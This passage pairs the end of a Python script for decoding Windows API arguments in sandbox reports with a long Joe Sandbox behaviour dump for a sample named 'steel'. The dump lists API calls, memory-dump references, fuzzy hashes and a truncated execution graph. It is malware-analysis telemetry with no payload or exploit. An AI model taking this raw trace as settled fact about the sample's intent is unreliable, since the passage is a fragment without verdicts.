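    ("RegOpenKeyExA", 0): _enum(HIVES),                   # hKey (predefined hive handle)
    ("RegOpenKeyExA", 3): _flags(REG_SAM),                # samDesired
    ("ShellExecuteA", 5): _enum(SHOW_CMD),                # nShowCmd
}


def decode_args(call: ApiCall) -> List[str]:
    """Return the argument list with known constants replaced by symbolic names; others pass through."""
    out = []
    for i, tok in enumerate(call.args):
        m = HEX_RE.match(tok)
        dec = DECODERS.get((call.api, i))
        out.append(dec(int(m.group(1), 16)) if (m and dec) else tok)
    return out


def describe(call: ApiCall) -> str:
    return "%08X  %s!%s(%s)" % (call.ref, call.module, call.api, ", ".join(decode_args(call)))


if __name__ == "__main__":
    for c in parse_block(SAMPLE):
        print(describe(c))
```

Decoding the class argument from the numeric value rather than trusting the annotation printed beside it is the point of the GetTokenInformation decoder: the value is what the code passed, the label is only the report's reading of it.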
                                                                                            APIs
                                                                                            • SendMessageA.USER32(00000000,0000044B,00000000,?), ref: 004501FD
                                                                                            • ShellExecuteA.SHELL32(00000000,open,00000000,00000000,00000000,00000001), ref: 0045022E
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ExecuteMessageSendShell
                                                                                            • String ID: open
                                                                                            • API String ID: 812272486-2758837156
                                                                                            • Opcode ID: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction ID: 7f57506e0c07b49dd0b520b237e7736b759e9f4ed638734fb0c833ac5abbff07
                                                                                            • Opcode Fuzzy Hash: ea446b968c091deb5619fe0c64f284e9fafe3e6cb185d1fb8701354efc215884
                                                                                            • Instruction Fuzzy Hash: A1216074E00204AFDB10DFA9C896B9EBBF8EB44705F1081BAB404E7292D678DE45CA59
                                                                                            APIs
                                                                                            • ShellExecuteEx.SHELL32(0000003C), ref: 0045532C
                                                                                            • GetLastError.KERNEL32(0000003C,00000000,00455375,?,?,?), ref: 0045533D
                                                                                              • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorExecuteLastShellSystem
                                                                                            • String ID: <
                                                                                            • API String ID: 893404051-4251816714
                                                                                            • Opcode ID: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction ID: 92df0b2f1231c5c49ece4c570041ef31d6ed92e86db86b93cafb864a5026e18c
                                                                                            • Opcode Fuzzy Hash: be62181711fdad770c23067a055a605ead6c89444dc6de91f0ff3b7559ccb240
                                                                                            • Instruction Fuzzy Hash: 172167B0600609ABDB10EF65C8926AE7BE8AF44355F54403AFC44E7291D7789E49CB98
                                                                                            APIs
                                                                                            • RtlEnterCriticalSection.KERNEL32(0049B420,00000000,)), ref: 004025C7
                                                                                            • RtlLeaveCriticalSection.KERNEL32(0049B420,0040263D), ref: 00402630
                                                                                              • Part of subcall function 004019CC: RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                              • Part of subcall function 004019CC: RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                              • Part of subcall function 004019CC: LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                              • Part of subcall function 004019CC: RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,02187D4C,?,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalSection$EnterLeave$AllocInitializeLocal
                                                                                            • String ID: )
                                                                                            • API String ID: 2227675388-1084416617
                                                                                            • Opcode ID: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                            • Instruction ID: 77bd95ba853a3ee3b707a504883d316aad751082ca23ba06a0d8aa2ba3da16af
                                                                                            • Opcode Fuzzy Hash: 09cf32ac568926239da630a480ec85c7fe0e44c3c7351229851fbcf18ccaddb2
                                                                                            • Instruction Fuzzy Hash: E11104317042046FEB15AB796F5962B6AD4D795758B24087FF404F33D2DABD8C02929C
                                                                                            APIs
                                                                                            • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 00496B69
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window
                                                                                            • String ID: /INITPROCWND=$%x $@
                                                                                            • API String ID: 2353593579-4169826103
                                                                                            • Opcode ID: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction ID: 88b10d18150c6b9811cea3f3864e76c9cf3cbfb68c265b437af87b1fefc14b87
                                                                                            • Opcode Fuzzy Hash: 065ab22c92abacbd348a857e8389b224364e1a84b4d72130b6d36c29b0d142f9
                                                                                            • Instruction Fuzzy Hash: A3117231A042489FDF01DBA4E855BAEBFE8EB49314F51847BE504E7292EB3CA905C658
                                                                                            APIs
                                                                                              • Part of subcall function 00403CA4: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000400), ref: 00403CDE
                                                                                              • Part of subcall function 00403CA4: SysAllocStringLen.OLEAUT32(?,00000000), ref: 00403CE9
                                                                                            • SysFreeString.OLEAUT32(?), ref: 004474C6
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: String$AllocByteCharFreeMultiWide
                                                                                            • String ID: NIL Interface Exception$Unknown Method
                                                                                            • API String ID: 3952431833-1023667238
                                                                                            • Opcode ID: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction ID: eb0132878ffe7144b3db707554455947565e11d0cdd4dc78092451a8fec87e99
                                                                                            • Opcode Fuzzy Hash: eaaa5532a95bbaa63f0b72a9291e33775e11d622c6162567185e6fee38e986d8
                                                                                            • Instruction Fuzzy Hash: 8011B9706082089FEB10DFA58C52A6EBBBCEB09704F91407AF504F7681D77C9D01CB69
                                                                                            APIs
                                                                                            • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000,00496443), ref: 0049640E
                                                                                            • CloseHandle.KERNEL32(004964A8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,000000FC,?,00496468,?,0049645C,00000000), ref: 00496425
                                                                                              • Part of subcall function 004962F8: GetLastError.KERNEL32(00000000,00496390,?,?,?,?), ref: 0049631C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseCreateErrorHandleLastProcess
                                                                                            • String ID: 0nI
                                                                                            • API String ID: 3798668922-794067871
                                                                                            • Opcode ID: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction ID: 4379268ebcebee96409867e54b2437a6ba0b21f89d1dc4ba20584320bf55fb87
                                                                                            • Opcode Fuzzy Hash: 9f8f3e3bd8d813766f30c87d8e8bb38219208be6823d56de1360ae23e0f090d4
                                                                                            • Instruction Fuzzy Hash: 840182B1644248AFDB00EBD1DC42A9EBBACDF08704F51403AB904E7281D6785E008A2D
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,Inno Setup: No Icons,00000000,00000000,00000000,00000000), ref: 0042DD78
                                                                                            • RegEnumValueA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,00000000,?,Inno Setup: No Icons,00000000,00000000,00000000), ref: 0042DDB8
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Value$EnumQuery
                                                                                            • String ID: Inno Setup: No Icons
                                                                                            • API String ID: 1576479698-2016326496
                                                                                            • Opcode ID: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction ID: 8d080c6700cf8453afd411d185ff7d2dd707f59376968ad674d2e7d16536e1ed
                                                                                            • Opcode Fuzzy Hash: 36a0b08f46d91d09f38f531e186592c2a543f82488f0210131226a48688c00be
                                                                                            • Instruction Fuzzy Hash: 1B012B33B55B7179FB3045256D01F7B57889B82B60F64013BF942EA2C0D6999C04936E
                                                                                            APIs
                                                                                            • SetFileAttributesA.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452EC3
                                                                                            • GetLastError.KERNEL32(00000000,?,00000000,00452EE9,?,?,-00000001,?), ref: 00452ECB
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 1799206407-488339322
                                                                                            • Opcode ID: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction ID: d2ab7b9b66ca24062e77e49c95e81f13ab46b8af1b1b2eb811bbb53637dcbd2b
                                                                                            • Opcode Fuzzy Hash: 164a1123582fd7f8b9629d9128a54c78742dfc935cb603b92947040143095295
                                                                                            • Instruction Fuzzy Hash: 86F0F971A04204AB8B01DB7A9D4249EB7ECEB8A32171045BBFC04E3642E7B84E048558
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 0045293F
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452965,?,-00000001,?), ref: 00452947
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID: T$H
                                                                                            • API String ID: 2018770650-488339322
                                                                                            • Opcode ID: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction ID: a1d21d86fbcf93c7076efe682877c1f84c37cf58088428800e153654eea74c02
                                                                                            • Opcode Fuzzy Hash: 54a576a396afaa571a066345412aacc20c83a6c328a38e41dddb38150347ef46
                                                                                            • Instruction Fuzzy Hash: 05F0C2B2B04608ABDB01EFB59D414AEB7E8EB4E315B6045B7FC04E3742E6B85E148598
                                                                                            APIs
                                                                                            • RemoveDirectoryA.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E47
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00452E6D,?,-00000001,00000000), ref: 00452E4F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                             • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                             • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: DirectoryErrorLastRemove
                                                                                            • String ID: T$H
                                                                                            • API String ID: 377330604-488339322
                                                                                            • Opcode ID: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction ID: a8b2bafe79397aca91686f8656b478e2385adfe3b855dfce5f6cc0b9ba314abc
                                                                                            • Opcode Fuzzy Hash: f20199e737e539a63e7b44ed2747663bd9db8366f39d7150388d1a26e91210d5
                                                                                            • Instruction Fuzzy Hash: 70F0FC71A04708AFCF01EF759D4249EB7E8DB4E31575049B7FC14E3642E7785E048598
                                                                                            APIs
                                                                                              • Part of subcall function 0047D0CC: FreeLibrary.KERNEL32(73AF0000,00481A2F), ref: 0047D0E2
                                                                                              • Part of subcall function 0047CD9C: GetTickCount.KERNEL32 ref: 0047CDE6
                                                                                              • Part of subcall function 00457294: SendMessageA.USER32(00000000,00000B01,00000000,00000000), ref: 004572B3
                                                                                            • GetCurrentProcess.KERNEL32(00000001,?,?,?,?,0049895B), ref: 00498059
                                                                                            • TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,0049895B), ref: 0049805F
                                                                                            Strings
                                                                                            • Detected restart. Removing temporary directory., xrefs: 00498013
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
                                                                                            • String ID: Detected restart. Removing temporary directory.
                                                                                            • API String ID: 1717587489-3199836293
                                                                                            • Opcode ID: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction ID: bb05712aa7eb36d303e19ffab6eef2c78f2a463723ea7eca767f41585c441369
                                                                                            • Opcode Fuzzy Hash: 281135f9a0ad5b4e488772808dcd9eaa6bf3b34c39f962a9f46887a4a11e3304
                                                                                            • Instruction Fuzzy Hash: BDE0E532208A406DDA1177BABC1396B7F5CDB46768B22487FF50882552D92D481CC53D
                                                                                            APIs
                                                                                            • GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                            • GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: CommandHandleLineModule
                                                                                            • String ID: P6U
                                                                                            • API String ID: 2123368496-31507372
                                                                                            • Opcode ID: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                            • Instruction ID: ff8fa06d391bd0b31f892a344b3e95d40f530220570fde7b1ba7fad45aeb04f1
                                                                                            • Opcode Fuzzy Hash: 48b45b62bccbc2a8e5daf731e4078a894a727d510552ebcfe8024faf6b9ab272
                                                                                            • Instruction Fuzzy Hash: 45C002609013058AD754AF7579467162A94D751349F80447FF114BA3E1D77C82055BDD
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.2980636968.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.2980607662.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980746953.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980783429.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980820828.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                            • Associated: 00000001.00000002.2980860842.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_steel.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastSleep
                                                                                            • String ID:
                                                                                            • API String ID: 1458359878-0
                                                                                            • Opcode ID: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction ID: f31041694d7e6b08a2ea33ec2b58b28b25921f40701f973673b956735a8b67d8
                                                                                            • Opcode Fuzzy Hash: 1a9f46df8411143c40a07a37eb8806f02fdea1552ea3146ec5e635b784cd6770
                                                                                            • Instruction Fuzzy Hash: 42F02B32705F58A78B21B56A889157FB2A8DB81366750012BFC0CD7313C878CC058BBC

                                                                                            Execution Graph

                                                                                            Execution Coverage: 2.6%
                                                                                            Dynamic/Decrypted Code Coverage: 84.8%
                                                                                            Signature Coverage: 10.7%
                                                                                            Total number of Nodes: 955
                                                                                            Total number of Limit Nodes: 36
                                                                                            execution_graph 61408 402a20 GetVersion 61433 403b64 HeapCreate 61408->61433 61410 402a7f 61411 402a84 61410->61411 61412 402a8c 61410->61412 61511 402b3b 8 API calls 61411->61511 61445 403844 61412->61445 61416 402a94 GetCommandLineA 61459 403712 61416->61459 61420 402aae 61491 40340c 61420->61491 61422 402ab3 61423 402ab8 GetStartupInfoA 61422->61423 61504 4033b4 61423->61504 61425 402aca GetModuleHandleA 61508 401f06 61425->61508 61434 403b84 61433->61434 61435 403bba 61433->61435 61512 403a1c 19 API calls 61434->61512 61435->61410 61437 403b89 61438 403b93 61437->61438 61440 403ba0 61437->61440 61513 403f3b HeapAlloc 61438->61513 61441 403bbd 61440->61441 61514 40478c HeapAlloc VirtualAlloc VirtualAlloc VirtualFree HeapFree 61440->61514 61441->61410 61442 403b9d 61442->61441 61444 403bae HeapDestroy 61442->61444 61444->61435 61515 402b5f 61445->61515 61448 403863 GetStartupInfoA 61451 4038af 61448->61451 61452 403974 61448->61452 61451->61452 61455 403920 61451->61455 61456 402b5f 12 API calls 61451->61456 61453 4039db SetHandleCount 61452->61453 61454 40399b GetStdHandle 61452->61454 61453->61416 61454->61452 61457 4039a9 GetFileType 61454->61457 61455->61452 61458 403942 GetFileType 61455->61458 61456->61451 61457->61452 61458->61455 61460 403760 61459->61460 61461 40372d GetEnvironmentStringsW 61459->61461 61463 403735 61460->61463 61464 403751 61460->61464 61462 403741 GetEnvironmentStrings 61461->61462 61461->61463 61462->61464 61465 402aa4 61462->61465 61466 40376d GetEnvironmentStringsW 61463->61466 61469 403779 61463->61469 61464->61465 61467 4037f3 GetEnvironmentStrings 61464->61467 61468 4037ff 61464->61468 61482 4034c5 61465->61482 61466->61465 61466->61469 61467->61465 61467->61468 61473 402b5f 12 API calls 61468->61473 61469->61469 61470 40378e WideCharToMultiByte 61469->61470 61471 4037ad 61470->61471 61472 4037df FreeEnvironmentStringsW 61470->61472 61474 
402b5f 12 API calls 61471->61474 61472->61465 61480 40381a 61473->61480 61475 4037b3 61474->61475 61475->61472 61476 4037bc WideCharToMultiByte 61475->61476 61478 4037d6 61476->61478 61479 4037cd 61476->61479 61477 403830 FreeEnvironmentStringsA 61477->61465 61478->61472 61524 402c11 61479->61524 61480->61477 61483 4034d7 61482->61483 61484 4034dc GetModuleFileNameA 61482->61484 61537 405d24 19 API calls 61483->61537 61486 4034ff 61484->61486 61487 402b5f 12 API calls 61486->61487 61488 403520 61487->61488 61490 403530 61488->61490 61538 402b16 7 API calls 61488->61538 61490->61420 61492 403419 61491->61492 61494 40341e 61491->61494 61539 405d24 19 API calls 61492->61539 61495 402b5f 12 API calls 61494->61495 61496 40344b 61495->61496 61503 40345f 61496->61503 61540 402b16 7 API calls 61496->61540 61497 4034a2 61499 402c11 7 API calls 61497->61499 61500 4034ae 61499->61500 61500->61422 61501 402b5f 12 API calls 61501->61503 61503->61497 61503->61501 61541 402b16 7 API calls 61503->61541 61505 4033bd 61504->61505 61507 4033c2 61504->61507 61542 405d24 19 API calls 61505->61542 61507->61425 61509 4020ab GetModuleHandleA 61508->61509 61512->61437 61513->61442 61514->61442 61519 402b71 61515->61519 61518 402b16 7 API calls 61518->61448 61520 402b6e 61519->61520 61522 402b78 61519->61522 61520->61448 61520->61518 61522->61520 61523 402b9d 12 API calls 61522->61523 61523->61522 61525 402c39 61524->61525 61526 402c1d 61524->61526 61525->61478 61527 402c27 61526->61527 61528 402c3d 61526->61528 61530 402c69 HeapFree 61527->61530 61531 402c33 61527->61531 61529 402c68 61528->61529 61533 402c57 61528->61533 61529->61530 61530->61525 61535 403fae VirtualFree VirtualFree HeapFree 61531->61535 61536 404a3f VirtualFree HeapFree VirtualFree 61533->61536 61535->61525 61536->61525 61537->61484 61538->61490 61539->61494 61540->61503 61541->61503 61542->61507 60624 401842 VirtualAlloc 60625 40de72 60624->60625 60626 401742 60627 40d57b RegQueryValueExA 60626->60627 60628 401c85 60629 
